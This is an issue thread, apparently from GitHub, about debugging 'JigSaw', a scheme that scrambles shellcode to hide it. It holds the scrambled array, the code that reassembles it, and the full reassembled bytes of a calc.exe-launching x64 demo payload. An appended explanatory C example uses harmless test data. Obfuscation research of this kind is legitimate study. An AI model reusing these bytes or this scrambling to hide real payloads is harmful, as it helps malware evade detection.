JigSaw Shellcode not working
Closed · 1 comment
TeamOffsec commented
I tried executing the example program to see if shellcode is actually generated, but it seems that the shellcode is not reconstructing. Do you think I am doing anything wrong?
#include <stdio.h>   // printf
#include <stdlib.h>  // system

int main() {
unsigned char jigsaw[276] = { 0x5d, 0x8b, 0x8d, 0xc0, 0x01, 0x48, 0x80, 0x00, 0x87, 0x7c, 0xc0, 0x74, 0x48, 0x58, 0xd1, 0x95, 0x00, 0xe9, 0xbd, 0x63, 0xe0, 0x01, 0x65, 0x01, 0x4a, 0x48, 0x6f, 0x44, 0x6a, 0xa2, 0x0a, 0x4c, 0xb7, 0x88, 0x5a, 0x01, 0xbb, 0xac, 0x0d, 0xba, 0x4d, 0x41, 0x59, 0x42, 0x49, 0x50, 0x5e, 0xbb, 0x5a, 0x41, 0x83, 0xc9, 0x28, 0x20, 0x00, 0x52, 0x00, 0xd2, 0x24, 0x41, 0x4a, 0x01, 0xff, 0xd0, 0xff, 0x56, 0x20, 0x31, 0x56, 0x8b, 0x6c, 0x31, 0x12, 0xf0, 0x34, 0x48, 0xac, 0x41, 0x8b, 0x01, 0x58, 0x48, 0x48, 0x04, 0x88, 0x48, 0xff, 0x52, 0x05, 0x65, 0xc9, 0xc1, 0x48, 0x8b, 0x75, 0x40, 0xd0, 0x59, 0x4d, 0xff, 0x61, 0x1c, 0x75, 0x4c, 0x01, 0x52, 0x8b, 0xc9, 0x56, 0x8b, 0x0c, 0x48, 0x58, 0xf1, 0x41, 0x31, 0x00, 0xd0, 0xd0, 0xec, 0x00, 0x59, 0x13, 0xe0, 0x72, 0x8b, 0x48, 0xff, 0x40, 0xd0, 0x00, 0x02, 0x75, 0x85, 0x20, 0x80, 0xc4, 0x58, 0x48, 0xd6, 0xd8, 0x47, 0x41, 0x59, 0x48, 0x01, 0xa6, 0xda, 0x8b, 0x41, 0xc1, 0x00, 0xc1, 0x48, 0xff, 0x52, 0x00, 0xfc, 0x51, 0x3c, 0x8b, 0x57, 0xe2, 0x2c, 0x0d, 0x01, 0xed, 0x31, 0x58, 0x7c, 0xd5, 0x01, 0x41, 0x00, 0x3c, 0x45, 0x51, 0x01, 0x08, 0x41, 0x49, 0x65, 0x00, 0x44, 0x52, 0xd0, 0x48, 0x52, 0x00, 0x5a, 0x8b, 0x3c, 0xe8, 0xe3, 0x48, 0x40, 0x8d, 0xba, 0x31, 0x44, 0x01, 0xfb, 0xf0, 0x48, 0x83, 0x51, 0x2e, 0x8b, 0x00, 0x83, 0x48, 0x61, 0x00, 0x66, 0x88, 0x00, 0x41, 0x41, 0xd5, 0x06, 0x41, 0xe4, 0x52, 0x38, 0x60, 0x20, 0x6f, 0xc0, 0x48, 0x49, 0x41, 0x20, 0x63, 0xc0, 0x72, 0xc1, 0x8b, 0x39, 0xc9, 0xba, 0x78, 0x8b, 0x41, 0x8b, 0x41, 0x00, 0xff, 0x8b, 0x89, 0x48, 0x00, 0x31, 0xff, 0x41, 0x41, 0x50, 0xb5, 0x03, 0x48, 0x41, 0x18, 0x67, 0x48, 0x41, 0x50, 0x0f, 0x8b, 0x48, 0xe0, 0xd5, 0x24, 0x18, 0xc9, 0x9d, 0x48, 0x41 };
int positions[276] = { 202, 22, 214, 6, 126, 104, 249, 81, 225, 51, 119, 86, 182, 142, 139, 236, 208, 197, 237, 267, 251, 89, 272, 217, 41, 83, 258, 95, 259, 231, 248, 132, 39, 110, 193, 148, 228, 48, 124, 234, 42, 107, 179, 72, 99, 91, 173, 254, 175, 121, 242, 116, 244, 70, 211, 23, 8, 19, 146, 169, 40, 167, 226, 168, 201, 103, 54, 222, 232, 96, 269, 18, 196, 229, 109, 29, 120, 55, 163, 100, 172, 25, 1, 164, 79, 33, 105, 27, 253, 20, 44, 122, 241, 223, 140, 157, 90, 261, 114, 199, 268, 158, 252, 134, 112, 187, 34, 57, 16, 108, 153, 194, 170, 131, 262, 115, 209, 149, 161, 184, 82, 174, 256, 129, 35, 156, 111, 188, 145, 76, 275, 52, 130, 84, 185, 78, 243, 177, 21, 113, 141, 255, 176, 192, 154, 216, 235, 264, 92, 191, 127, 260, 56, 88, 265, 69, 219, 0, 66, 49, 77, 198, 62, 53, 58, 205, 63, 46, 190, 247, 227, 160, 233, 206, 245, 137, 15, 75, 136, 151, 147, 274, 212, 155, 64, 101, 37, 14, 218, 181, 68, 73, 5, 102, 203, 97, 215, 204, 118, 143, 60, 250, 4, 67, 183, 11, 271, 71, 9, 2, 74, 50, 7, 150, 165, 207, 65, 10, 266, 246, 171, 3, 31, 128, 24, 32, 224, 47, 45, 159, 162, 98, 270, 85, 257, 61, 195, 138, 106, 221, 273, 30, 180, 152, 125, 210, 239, 26, 263, 117, 80, 43, 200, 220, 178, 36, 230, 133, 17, 186, 94, 87, 93, 12, 13, 38, 144, 166, 189, 240, 135, 28, 123, 238, 213, 59 };
unsigned int calc_len = 276;
char calc_payload[276] = { 0x00 };
int position;
// Reconstruct the payload: byte idx of jigsaw[] belongs at offset positions[idx]
for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); idx++) {
position = positions[idx];
calc_payload[position] = jigsaw[idx];
}
printf("Decrypted Shellcode is %p\n", calc_payload);
system("pause");
return 0;
}
hardwaterhacker commented
Your printf statement will print out a pointer to the calc_payload buffer. If you want to verify the bytes in the buffer, you'd need to actually print the contents of the buffer, rather than printing the buffer address.
This code will allow you to see the contents of the buffer to verify it's been reassembled properly:
for (int i = 0; i < sizeof(calc_payload) / sizeof(calc_payload[0]); i++) {
printf("0x%02x, ", calc_payload[i]);
}
Doing that will give you the contents. Note: for it to print out properly, I needed to change the declaration from `char calc_payload` to `unsigned char calc_payload`. I've updated the repo with this change.
└─$ ./jigsaw
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
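The two things this thread turns on, that `%p` prints an address rather than bytes and that a signed `char` makes `%02x` print `0xfffffffc` instead of `0xfc`, plus a check that is useful whenever a permutation-based reassembly "does nothing": verify that the positions table is actually a permutation of 0..n-1. The code below is an added example, not part of the repository or of either comment. It works on a constructed 11-byte ASCII message instead of the shellcode from the thread, and the names `positions_are_permutation`, `reconstruct`, `to_hex` and `signed_char_pitfall` are my own, not functions of the project.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Constructed sample (not the project's data): the 11-byte message
 * "JIGSAW-TEST" plays the role of the payload, stored scrambled the same
 * way the example program stores jigsaw[]: byte idx belongs at positions[idx]. */
#define SAMPLE_LEN 11
static const unsigned char sample_jigsaw[SAMPLE_LEN] = {
    'W', 'J', 'S', 'G', 'T', 'I', 'T', 'A', 'E', 'S', '-'
};
static const int sample_positions[SAMPLE_LEN] = { 5, 0, 9, 2, 7, 1, 10, 4, 8, 3, 6 };
/* A deliberately broken map (constructed): 3 appears twice and 6 never, so one
 * output slot is overwritten and another is left as 0x00. */
static const int broken_positions[SAMPLE_LEN] = { 5, 0, 9, 2, 7, 1, 10, 4, 8, 3, 3 };

/* Returns 1 if positions[] is a permutation of 0..n-1 (every output slot
 * written exactly once), 0 otherwise. Reassembling with a table that is not a
 * permutation silently leaves gaps, which looks like "not reconstructing". */
int positions_are_permutation(const int *positions, size_t n) {
    unsigned char *seen = calloc(n, 1);
    int ok = 1;
    if (!seen) return 0;
    for (size_t i = 0; i < n && ok; i++) {
        int p = positions[i];
        if (p < 0 || (size_t)p >= n || seen[p]) ok = 0;
        else seen[p] = 1;
    }
    free(seen);
    return ok;
}

/* Bounds-checked form of the example's loop: out[positions[i]] = jigsaw[i].
 * Returns 0 on success, -1 if any position falls outside out[]. */
int reconstruct(unsigned char *out, size_t out_len,
                const unsigned char *jigsaw, const int *positions, size_t n) {
    memset(out, 0, out_len);
    for (size_t i = 0; i < n; i++) {
        int p = positions[i];
        if (p < 0 || (size_t)p >= out_len) return -1;
        out[p] = jigsaw[i];
    }
    return 0;
}

/* Formats buf as "0x%02x, " per byte (the maintainer's verification loop),
 * taking unsigned char so that 0xfc prints as "0xfc". Returns chars written. */
size_t to_hex(const unsigned char *buf, size_t n, char *out, size_t out_len) {
    size_t used = 0;
    if (out_len) out[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        int w = snprintf(out + used, out_len - used, "0x%02x, ", buf[i]);
        if (w < 0 || (size_t)w >= out_len - used) break;
        used += (size_t)w;
    }
    return used;
}

/* Why the maintainer switched to unsigned char: plain char is signed on many
 * compilers, so the byte 0xfc is the value -4, and integer promotion turns it
 * into 0xfffffffc when printed with %02x. Returns the length of that output. */
size_t signed_char_pitfall(char *out, size_t out_len) {
    signed char sc = -4;  /* the bit pattern 0xfc seen through a signed char */
    return (size_t)snprintf(out, out_len, "0x%02x", (unsigned)(int)sc);
}

int main(void) {
    unsigned char payload[SAMPLE_LEN + 1] = { 0 };  /* +1 keeps it printable with %s */
    char hex[SAMPLE_LEN * 6 + 1];
    char bad[16];

    printf("sample positions are a permutation: %d\n",
           positions_are_permutation(sample_positions, SAMPLE_LEN));
    printf("broken positions are a permutation: %d\n",
           positions_are_permutation(broken_positions, SAMPLE_LEN));

    if (reconstruct(payload, SAMPLE_LEN, sample_jigsaw, sample_positions, SAMPLE_LEN) == 0) {
        to_hex(payload, SAMPLE_LEN, hex, sizeof hex);
        printf("reconstructed bytes: %s (%s)\n", hex, payload);
    }
    signed_char_pitfall(bad, sizeof bad);
    printf("0xfc printed through a signed char: %s\n", bad);
    return 0;
}
```

Run the permutation check once on the generated positions table before anything else; if it fails, the generator (not the reconstruction loop) is where to look. Printing the buffer through `to_hex`, or through the maintainer's loop with an `unsigned char` buffer, is what lets you compare the reassembled bytes against the original input byte for byte.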